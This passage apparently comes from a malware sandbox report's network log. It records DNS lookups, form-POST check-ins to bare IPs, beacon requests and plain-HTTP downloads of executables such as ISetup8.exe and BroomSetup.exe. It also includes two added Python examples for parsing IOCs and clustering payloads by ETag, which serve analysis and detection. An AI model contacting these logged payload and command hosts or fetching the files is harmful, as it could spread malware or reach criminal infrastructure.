Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:26:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 185.172.128.19:80
Request: POST /ghsdh39s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.19
Content-Length: 158
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:26:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 185.172.128.19:80
Response: HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:26:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
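The records above (DNS answers, the 8-byte form-encoded POST /api check-ins to the .shop hosts, the form POSTs straight to 185.172.128.19, and executable downloads over plain HTTP) are easier to turn into IOCs once the flattened report lines are parsed. The following Python is an added example written for this page; it is not part of the sandbox report and not code from any of the malware families it lists. It parses the report's "Remote address ... Request ... Response" record shape (four records from the log above are embedded as SAMPLE_LOG, a constructed sample), maps each queried name to its A answers, and tags HTTP exchanges with three heuristics chosen here: a tiny form-encoded POST /api to a named host, a form POST to an IP literal, and a successful GET whose response carries an executable MIME type or an .exe path. The 16-byte body cap and the MIME list are this example's assumptions, not signatures taken from the report.

```python
# Added example: parse the flattened sandbox network-log records shown above ("Remote
# address ... Request ... Response") and tag IOC-bearing traffic. Thresholds and MIME
# lists below are heuristics chosen for this example, not signatures from the report.
import re

# Constructed sample: four records copied from the log above, in its flattened form.
SAMPLE_LOG = """\
Remote address:8.8.8.8:53Requestdismissalcylinderhostw.shopIN AResponsedismissalcylinderhostw.shopIN A104.21.22.160dismissalcylinderhostw.shopIN A172.67.205.132
-
Remote address:104.21.22.160:443RequestPOST /api HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Host: dismissalcylinderhostw.shop
ResponseHTTP/1.1 200 OK
-
Remote address:193.233.132.234:80RequestGET /files/file300un.exe HTTP/1.1
Host: 193.233.132.234
ResponseHTTP/1.1 200 OK
Content-Length: 419984
Content-Type: application/x-msdownload
-
Remote address:185.172.128.19:80RequestPOST /ghsdh39s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.19
Content-Length: 4
ResponseHTTP/1.1 200 OK
-
"""

REMOTE_RE = re.compile(r"Remote address:(?P<ip>[\d.]+):(?P<port>\d+)(?P<rest>.*)")
REQ_LINE_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d$")
QNAME_RE = re.compile(r"^(?P<name>\S+?)IN (?:A|AAAA|CNAME|PTR)$")
A_ANSWER_RE = re.compile(r"IN A(\d{1,3}(?:\.\d{1,3}){3})")  # only A answers are harvested
IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
BINARY_TYPES = {"application/x-msdownload", "application/x-msdos-program",
                "application/x-ms-dos-executable", "application/octet-stream"}

def _records(text):
    """Yield one list of lines per record; a line holding only "-" closes a record."""
    for chunk in re.split(r"(?m)^-[ \t]*$", text):
        if lines := chunk.strip().splitlines():
            yield lines

def _headers(lines):
    pairs = (ln.partition(":") for ln in lines)
    return {name.strip().lower(): value.strip() for name, sep, value in pairs if sep}

def parse_log(text):
    """Return (dns, exchanges): dns maps queried names to sorted A answers; exchanges are dicts."""
    dns, exchanges = {}, []
    for rec in _records(text):
        m = REMOTE_RE.search(rec[0])
        if not m:
            continue
        ip, port, rest = m["ip"], int(m["port"]), m["rest"]
        if port == 53:
            query, _, answers = rest.partition("Response")
            q = QNAME_RE.match(query.removeprefix("Request"))
            name = q["name"] if q else answers.split("IN ", 1)[0]  # response-only DNS line
            if ips := A_ANSWER_RE.findall(answers):
                dns.setdefault(name, set()).update(ips)
            continue
        if rest.startswith("Request"):
            first, body = rest[len("Request"):], rec[1:]
        else:  # response-only HTTP record, which the log does contain
            first, body = "", [rest] + rec[1:]
        rl = REQ_LINE_RE.match(first)
        cut = next((i for i, ln in enumerate(body) if ln.startswith("ResponseHTTP/")), len(body))
        ex = {"ip": ip, "port": port, "method": rl["method"] if rl else "",
              "path": rl["path"] if rl else "",
              "status": int(body[cut].split()[1]) if cut < len(body) else 0,
              "req": _headers(body[:cut]), "resp": _headers(body[cut + 1:])}
        ex["host"] = ex["req"].get("host", ip)
        exchanges.append(ex)
    return {k: sorted(v) for k, v in dns.items()}, exchanges

def classify(ex):
    """Return the first matching heuristic tag for an exchange, or None."""
    form = ex["req"].get("content-type", "").startswith("application/x-www-form-urlencoded")
    size = int(ex["req"].get("content-length", "0") or 0)
    rtype = ex["resp"].get("content-type", "").split(";")[0].strip().lower()
    bare_ip = bool(IP_RE.match(ex["host"]))
    if ex["method"] == "POST" and ex["path"] == "/api" and form and size <= 16 and not bare_ip:
        return "small-api-checkin"  # the Content-Length: 8 POST /api beacons to the .shop hosts
    if ex["method"] == "POST" and form and bare_ip:
        return "bare-ip-form-post"  # e.g. POST /ghsdh39s/index.php straight to 185.172.128.19
    if ex["method"] == "GET" and ex["status"] == 200 and (rtype in BINARY_TYPES or ex["path"].lower().endswith(".exe")):
        return "binary-download"
    return None

def triage(text):
    """Map each heuristic tag to the URLs that matched; "dns" carries the resolved names."""
    dns, exchanges = parse_log(text)
    report = {"dns": dns}
    for ex in exchanges:
        if tag := classify(ex):
            scheme = "https" if ex["port"] == 443 else "http"
            report.setdefault(tag, []).append(f"{scheme}://{ex['host']}{ex['path']}")
    return report

REPORT = triage(SAMPLE_LOG)  # evaluated at import so the module demonstrates itself
```

Only A answers are harvested, keyed by the queried name, because in this flattened form a CNAME target runs straight into the next owner name and cannot be split reliably. The A-record regex would also misattribute an address that is immediately followed by a name beginning with a digit; that does not occur in the records above, but it is worth knowing before running this over a larger export.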
Remote address: 185.172.128.59:80
Request: GET /ISetup8.exe HTTP/1.1
Host: 185.172.128.59
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Sun, 05 May 2024 22:15:01 GMT
ETag: "68201-617bc48bc7f8f"
Accept-Ranges: bytes
Content-Length: 426497
Content-Type: application/x-msdos-program
-
Remote address: 8.8.8.8:53
Request: junglethomas.com IN A
Response: junglethomas.com IN A 104.21.92.190
          junglethomas.com IN A 172.67.197.33
-
Remote address: 193.233.132.234:80
Response: HTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Sun, 05 May 2024 06:37:39 GMT
ETag: "63aba2-617af307316c9"
Accept-Ranges: bytes
Content-Length: 6532002
Content-Type: application/x-msdownload
-
Remote address: 8.8.8.8:53
Response: ipinfo.io IN A 34.117.186.192
-
Remote address: 34.117.186.192:443
Request: GET /widget/demo/191.101.209.39 HTTP/1.1
Connection: Keep-Alive
Referer: https://ipinfo.io/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Host: ipinfo.io
-
Remote address: 8.8.8.8:53
Request: 26.56.192.85.in-addr.arpa IN PTR
Response: 26.56.192.85.in-addr.arpa IN PTR somber-health.aeza.network
-
Remote address: 8.8.8.8:53
Request: 59.8.26.104.in-addr.arpa IN PTR
-
Remote address: 8.8.8.8:53
Request: 48.229.111.52.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: service-domain.xyz IN A
Response: service-domain.xyz IN A 3.80.150.121
-
GET https://service-domain.xyz/google_ifi_ico.png?rnd=yb3VBr8YUm4Bvu3oOx6xH_DYEC5GYEC3AYEC6OYEC3GYEC4RZEC3NYEC8AYEC8RZEC3PXEC6RZEC7TVEC0 (process: CotgOgQ.exe)
Remote address: 3.80.150.121:443
Request: GET /google_ifi_ico.png?rnd=yb3VBr8YUm4Bvu3oOx6xH_DYEC5GYEC3AYEC6OYEC3GYEC4RZEC3NYEC8AYEC8RZEC3PXEC6RZEC7TVEC0 HTTP/1.1
Host: service-domain.xyz
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:27:16 GMT
Content-Type: image/png
Content-Length: 95
Connection: keep-alive
Access-Control-Allow-Origin: *
Cache-control: no-cache="set-cookie"
Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200
Set-Cookie: AWSELBCORS=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200;SECURE;SAMESITE=None
-
GET https://service-domain.xyz/google_ifi_ico.png?rnd=kE3mAh2aM5ME8QZf1Kf_KEWB6PEWB4JEWB6XEWB1PEWB7MDWB0UEWB3JEWB5MDWB1WDWB2MDWB4YGWB7 (process: FhZPPvs.exe)
Remote address: 3.80.150.121:443
Request: GET /google_ifi_ico.png?rnd=kE3mAh2aM5ME8QZf1Kf_KEWB6PEWB4JEWB6XEWB1PEWB7MDWB0UEWB3JEWB5MDWB1WDWB2MDWB4YGWB7 HTTP/1.1
Host: service-domain.xyz
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:27:16 GMT
Content-Type: image/png
Content-Length: 95
Connection: keep-alive
Access-Control-Allow-Origin: *
Cache-control: no-cache="set-cookie"
Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9824CDF98F06272B58281A369C0E7C7AE6EC5781D948882C8767BA08E2574E7340BD1AEA80ADD88F1586867317B7C62D227;PATH=/;MAX-AGE=43200
Set-Cookie: AWSELBCORS=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9824CDF98F06272B58281A369C0E7C7AE6EC5781D948882C8767BA08E2574E7340BD1AEA80ADD88F1586867317B7C62D227;PATH=/;MAX-AGE=43200;SECURE;SAMESITE=None
-
Remote address: 8.8.8.8:53
Request: 11.97.55.23.in-addr.arpa IN PTR
Response: 11.97.55.23.in-addr.arpa IN PTR a23-55-97-11.deploy.static.akamaitechnologies.com
-
Remote address: 8.8.8.8:53
Request: 121.150.80.3.in-addr.arpa IN PTR
Response: 121.150.80.3.in-addr.arpa IN PTR ec2-3-80-150-121.compute-1.amazonaws.com
-
Remote address:8.8.8.8:53Request80.190.18.2.in-addr.arpaIN PTRResponse80.190.18.2.in-addr.arpaIN PTRa2-18-190-80deploystaticakamaitechnologiescom
-
Remote address: 8.8.8.8:53
Request: clients2.google.com IN A
Response: clients2.google.com IN CNAME clients.l.google.com
          clients.l.google.com IN A 172.217.16.238
-
GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&kkLnvSrFVx (process: CotgOgQ.exe)
Remote address: 172.217.16.238:443
Request: GET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&kkLnvSrFVx HTTP/1.1
Host: clients2.google.com
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sun, 05 May 2024 22:27:17 GMT
Location: https://clients2.googleusercontent.com/crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
-
Remote address: 8.8.8.8:53
Request: 10.200.250.142.in-addr.arpa IN PTR
Response: 10.200.250.142.in-addr.arpa IN PTR lhr48s29-in-f10.1e100.net
-
GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&kLiQCBPVzB (process: FhZPPvs.exe)
Remote address: 172.217.16.238:443
Request: GET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&kLiQCBPVzB HTTP/1.1
Host: clients2.google.com
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sun, 05 May 2024 22:27:17 GMT
Location: https://clients2.googleusercontent.com/crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
-
Remote address: 8.8.8.8:53
Request: clients2.googleusercontent.com IN A
Response: clients2.googleusercontent.com IN CNAME googlehosted.l.googleusercontent.com
          googlehosted.l.googleusercontent.com IN A 216.58.201.97
-
GET https://clients2.googleusercontent.com/crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx (process: CotgOgQ.exe)
Remote address: 216.58.201.97:443
Request: GET /crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1
Connection: Keep-Alive
Cache-Control: no-cache
Host: clients2.googleusercontent.com
Response: HTTP/1.1 200 OK
Content-Length: 26186
X-GUploader-UploadID: ABPtcPr-cxkWLpwK9DGwSxbVWQ1JKmK6E_vuETCmDifkkMz2KMprS2K25yxmgt23Bbvk91NphrjQKbX-_A
X-Goog-Hash: crc32c=i5zIOg==
Server: UploadServer
Date: Sun, 05 May 2024 20:58:55 GMT
Expires: Mon, 05 May 2025 20:58:55 GMT
Cache-Control: public, max-age=31536000
Age: 5302
Last-Modified: Fri, 31 Mar 2023 12:41:59 GMT
ETag: eefd433b_0ed85c7c_6772d0c2_d374e578_c3d87100
Content-Type: application/x-chrome-extension
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GET https://clients2.googleusercontent.com/crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx (process: FhZPPvs.exe)
Remote address: 216.58.201.97:443
Request: GET /crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1
Connection: Keep-Alive
Cache-Control: no-cache
Host: clients2.googleusercontent.com
Response: HTTP/1.1 200 OK
Content-Length: 26186
X-GUploader-UploadID: ABPtcPr-cxkWLpwK9DGwSxbVWQ1JKmK6E_vuETCmDifkkMz2KMprS2K25yxmgt23Bbvk91NphrjQKbX-_A
X-Goog-Hash: crc32c=i5zIOg==
Server: UploadServer
Date: Sun, 05 May 2024 20:58:55 GMT
Expires: Mon, 05 May 2025 20:58:55 GMT
Cache-Control: public, max-age=31536000
Age: 5302
Last-Modified: Fri, 31 Mar 2023 12:41:59 GMT
ETag: eefd433b_0ed85c7c_6772d0c2_d374e578_c3d87100
Content-Type: application/x-chrome-extension
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address: 8.8.8.8:53
Request: 238.16.217.172.in-addr.arpa IN PTR
Response: 238.16.217.172.in-addr.arpa IN PTR lhr48s28-in-f14.1e100.net
          238.16.217.172.in-addr.arpa IN PTR mad08s04-in-f14.1e100.net
-
Remote address: 8.8.8.8:53
Request: 97.201.58.216.in-addr.arpa IN PTR
Response: 97.201.58.216.in-addr.arpa IN PTR lhr48s48-in-f1.1e100.net
          97.201.58.216.in-addr.arpa IN PTR prg03s02-in-f1.1e100.net
          97.201.58.216.in-addr.arpa IN PTR prg03s02-in-f97.1e100.net
-
Remote address: 8.8.8.8:53
Request: api3.check-data.xyz IN A
Response: api3.check-data.xyz IN CNAME checkdata-1114476139.us-west-2.elb.amazonaws.com
          checkdata-1114476139.us-west-2.elb.amazonaws.com IN A 44.231.33.228
          checkdata-1114476139.us-west-2.elb.amazonaws.com IN A 35.82.94.151
-
Remote address: 44.231.33.228:80
Request: POST /api2/google_api_ifi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36
Host: api3.check-data.xyz
Content-Length: 731
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Cache-control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
Date: Sun, 05 May 2024 22:28:53 GMT
Server: nginx
Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9824CDF98F06272B58281A369C0E7C7AE6EC5781D948882C8767BA08E2574E7340BD1AEA80ADD88F1586867317B7C62D227;PATH=/;MAX-AGE=43200
Content-Length: 0
Connection: keep-alive
-
Remote address: 8.8.8.8:53
Request: 228.33.231.44.in-addr.arpa IN PTR
Response: 228.33.231.44.in-addr.arpa IN PTR ec2-44-231-33-228.us-west-2.compute.amazonaws.com
-
Remote address: 8.8.8.8:53
Request: 172.210.232.199.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 185.172.128.90:80
Request: GET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1
Host: 185.172.128.90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Content-Type: text/html; charset=UTF-8
-
Remote address: 8.8.8.8:53
Request: 90.128.172.185.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 185.172.128.228:80
Request: GET /ping.php?substr=five HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.59:80
Request: GET /syncUpd.exe HTTP/1.1
Host: 185.172.128.59
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Sun, 05 May 2024 22:15:01 GMT
ETag: "44a00-617bc48b8a72d"
Accept-Ranges: bytes
Content-Length: 281088
Content-Type: application/x-msdos-program
-
Remote address: 185.172.128.228:80
Request: GET /BroomSetup.exe HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
ETag: "4a4030-613b1bf118700"
Accept-Ranges: bytes
Content-Length: 4866096
Content-Type: application/x-msdos-program
-
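Several of the payload servers above return two-part ETags beside Content-Length and Last-Modified ("66890-617b06c84a0a2" for file300un.exe, "66376244-575d18" for AppGate2103v01.exe). The following Python is an added example written for this page, not code from the report or from any tool it lists. It decodes the two common two-part layouts (Apache's default FileETag "MTime Size", which emits the size in hex followed by the mtime in hex microseconds, and nginx's mtime in hex seconds followed by the size in hex), keeps whichever layout puts a size equal to Content-Length in the tag, and then clusters the downloads above by size and server-side mtime to the second. The seven DOWNLOADS rows are copied from the responses above; that the mtime-first tags came from nginx is an inference from the tag shape, since those responses carry no Server header.

```python
# Added example: decode the two-part ETags the payload servers above send. Apache's default
# FileETag ("MTime Size") emits "<size hex>-<mtime hex, microseconds>"; nginx emits
# "<mtime hex, seconds>-<size hex>". Either way the tag cross-checks Content-Length and
# dates the file on the server, so same-size, same-second files cluster across names and hosts.
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample: (URL, ETag, Content-Length) rows copied from the responses above.
DOWNLOADS = [
    ("http://193.233.132.234/files/file300un.exe", '"66890-617b06c84a0a2"', 419984),
    ("http://185.172.128.59/ISetup5.exe", '"68201-617bc48bc604f"', 426497),
    ("http://185.172.128.59/ISetup8.exe", '"68201-617bc48bc7f8f"', 426497),
    ("http://185.172.128.59/syncUpd.exe", '"44a00-617bc48b8a72d"', 281088),
    ("http://193.233.132.175/server/ww12/AppGate2103v01.exe", '"66376244-575d18"', 5725464),
    ("http://185.172.128.19/NewB.exe", '"654d20ab-68a00"', 428544),
    ("http://185.172.128.228/BroomSetup.exe", '"4a4030-613b1bf118700"', 4866096),
]


def decode_etag(etag, content_length):
    """Return (layout, mtime as an aware UTC datetime) for whichever two-part layout puts a
    size equal to Content-Length in the tag, or None when neither does (size mismatch,
    a non-default FileETag setting, or a tag that is not two hex fields)."""
    parts = etag.strip('"').split("-")
    if len(parts) != 2:
        return None
    try:
        left, right = (int(p, 16) for p in parts)
    except ValueError:
        return None
    if left == content_length:  # Apache: size-mtime, mtime in microseconds
        return "apache", datetime.fromtimestamp(right / 1_000_000, tz=timezone.utc)
    if right == content_length:  # nginx: mtime-size, mtime in seconds
        return "nginx", datetime.fromtimestamp(left, tz=timezone.utc)
    return None


def cluster_payloads(rows):
    """Group URLs whose ETag decodes to the same (size, mtime to the second); a match is a
    strong hint that one file is served under several names. Undecodable tags share one key."""
    groups = defaultdict(list)
    for url, etag, length in rows:
        decoded = decode_etag(etag, length)
        key = (length, decoded[1].replace(microsecond=0)) if decoded else ("undecoded", None)
        groups[key].append(url)
    return dict(groups)


if __name__ == "__main__":
    for (size, stamp), urls in cluster_payloads(DOWNLOADS).items():
        print(size, stamp, urls)
```

Decoding shows ISetup5.exe and ISetup8.exe share the size 426497 and the mtime 22:15:01, with tags that differ only in the microsecond field (about 8 ms apart), so they were written to the server within the same second and are very likely one payload under two names; cluster_payloads groups them, while syncUpd.exe (281088 bytes, same second) stays separate. The decoded Apache timestamps also agree with the Last-Modified headers above to the second, which is the sanity check to run before trusting a tag from an unfamiliar server.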
Remote address: 8.8.8.8:53
Request: 228.128.172.185.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: svc.iolo.com IN A
Response: svc.iolo.com IN A 20.157.87.45
-
Remote address: 20.157.87.45:80
Request: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0
Connection: keep-alive
Content-Length: 300
Host: svc.iolo.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Response: HTTP/1.1 200 OK
content-length: 256
content-type: text/html; charset=utf-8
x-whom: Ioloweb7
date: Sun, 05 May 2024 22:27:32 GMT
set-cookie: SERVERID=svc7; path=/
connection: close
-
Remote address: 8.8.8.8:53
Request: 45.87.157.20.in-addr.arpa IN PTR
Response: (none)
-
Remote address: 8.8.8.8:53
Request: download.iolo.net IN A
Response: download.iolo.net IN CNAME iolo0.b-cdn.net; iolo0.b-cdn.net IN A 185.93.2.246
-
HEAD https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe (process: BITS)
Remote address: 185.93.2.246:443
Request: HEAD /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net
Response: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 59721128
Connection: keep-alive
Server: BunnyCDN-FR1-946
CDN-PullZone: 1654350
CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
CDN-RequestCountryCode: GB
Cache-Control: public, max-age=259200
Last-Modified: Tue, 19 Mar 2024 23:10:11 GMT
CDN-StorageServer: DE-680
CDN-FileServer: 757
CDN-ProxyVer: 1.04
CDN-RequestPullSuccess: True
CDN-RequestPullCode: 206
CDN-CachedAt: 05/01/2024 17:21:57
CDN-EdgeStorageId: 1072
CDN-Status: 200
CDN-RequestId: f1aff9836f5a7034c939caf1396f59a9
CDN-Cache: HIT
Accept-Ranges: bytes
-
GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe (process: BITS)
Remote address: 185.93.2.246:443
Request: GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 19 Mar 2024 23:10:11 GMT
Range: bytes=0-11199
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net
Response: HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 11200
Connection: keep-alive
Server: BunnyCDN-FR1-946
CDN-PullZone: 1654350
CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
CDN-RequestCountryCode: GB
Cache-Control: public, max-age=259200
Last-Modified: Tue, 19 Mar 2024 23:10:11 GMT
CDN-StorageServer: DE-680
CDN-FileServer: 757
CDN-ProxyVer: 1.04
CDN-RequestPullSuccess: True
CDN-RequestPullCode: 206
CDN-CachedAt: 05/01/2024 17:21:57
CDN-EdgeStorageId: 1072
CDN-Status: 200
CDN-RequestId: cef8aae71e5b32ee78942f471581448e
CDN-Cache: HIT
Content-Range: bytes 0-11199/59721128
-
GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe (process: BITS)
Remote address: 185.93.2.246:443
Request: GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 19 Mar 2024 23:10:11 GMT
Range: bytes=11200-190399
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net
Response: HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 179200
Connection: keep-alive
Server: BunnyCDN-FR1-946
CDN-PullZone: 1654350
CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
CDN-RequestCountryCode: GB
Cache-Control: public, max-age=259200
Last-Modified: Tue, 19 Mar 2024 23:10:11 GMT
CDN-StorageServer: DE-680
CDN-FileServer: 757
CDN-ProxyVer: 1.04
CDN-RequestPullSuccess: True
CDN-RequestPullCode: 206
CDN-CachedAt: 05/01/2024 17:21:57
CDN-EdgeStorageId: 1072
CDN-Status: 200
CDN-RequestId: cdb07560d5dd1215cdea64ef643452b1
CDN-Cache: HIT
Content-Range: bytes 11200-190399/59721128
-
